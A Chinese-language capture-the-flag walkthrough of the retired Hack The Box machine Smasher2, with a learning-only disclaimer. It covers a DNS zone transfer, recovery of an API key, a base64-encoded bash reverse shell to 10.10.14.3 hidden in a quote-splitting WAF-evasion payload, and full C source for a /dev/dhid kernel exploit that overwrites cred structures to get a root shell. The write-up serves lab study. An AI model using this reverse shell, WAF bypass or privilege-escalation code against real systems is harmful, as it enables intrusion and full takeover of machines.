本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.135
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.135 -o ./Smasher2-autorecon
有dns服务开启,试试区域传送
dig -t axfr smasher2.htb @10.10.10.135
发现好些域名,绑定hosts访问
10.10.10.135 wonderfulsessionmanager.smasher2.htb smasher2.htb root.smasher2.htb
爆破下目录
发现目录backup有敏感文件
先把上面两个文件下载下来放着,访问绑定的hosts域名发现一个登陆窗口
这里卡了很久,本靶机难度还是很高的,后来通过网上的writeup分析上面下载下来的文件,得出如下,具体分析可参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html
得到api接口的请求key值,可以通过此key执行命令,在测试的过程中发现有WAF对常规的命令进行拦截,直接使用绕过WAF的执行命令代码反弹shell
WAF绕过技术 https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 echo '/bin/bash -i >& /dev/tcp/10.10.14.3/8833 0>&1' | base64 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== 原始命令 echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg== | base64 -d | bash 绕过WAF命令 {"schedule": "ec''ho 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMvODgzMyAwPiYxCg=='|'b'a''s''e'6'4 -'d'|b'a''s'h"}
为了稳定方便的连接目标靶机,本地生成公钥和私钥,然后通过私钥连接到目标靶机
准备root提权,这里提权需要自己写exploit,具体分析和编写exploit参考:https://0xdf.gitlab.io/2019/12/14/htb-smasher2.html#priv-dzonerzy--root
#include <stdio.h> #include <fcntl.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/mman.h> int main ( int argc, char * const * argv) { printf ( "[+] PID: %d " , getpid()); int fd = open( "/dev/dhid" , O_RDWR); if (fd < 0 ) { printf ( "[-] Open failed! " ); return -1 ; } printf ( "[+] Open OK fd: %d " , fd); unsigned long size = 0xf0000000 ; unsigned long mmapStart = 0x42424000 ; unsigned int * addr = ( unsigned int *)mmap(( void *)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0 ); if (addr == MAP_FAILED) { perror( "Failed to mmap: " ); close(fd); return -1 ; } printf ( "[+] mmap OK addr: %lx " , addr); unsigned int uid = getuid(); printf ( "[+] UID: %d " , uid); unsigned int credIt = 0 ; unsigned int credNum = 0 ; while ((( unsigned long )addr) < (mmapStart + size - 0x40 )) { credIt = 0 ; if ( addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid && addr[credIt++] == uid ) { credNum++; printf ( "[+] Found cred structure! ptr: %p, credNum: %d " , addr, credNum); credIt = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; addr[credIt++] = 0 ; if (getuid() == 0 ) { puts ( "[+] GOT ROOT!" ); credIt += 1 ; //Skip 4 bytes, to get capabilities addr addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++ ] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff ; addr[credIt++] = 0xffffffff; execl( "/bin/sh" , "-" , ( char *) NULL ); puts ( "[-] Execl failed..." ); break ; } else { credIt = 0 ; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; addr[credIt++] = uid; } } addr++; } puts ( "[+] Scanning loop END" ); fflush( stdout ); int stop = getchar(); return 0 ; }
通过本地kali编译完成之后再使用scp传到目标靶机执行exploit提权
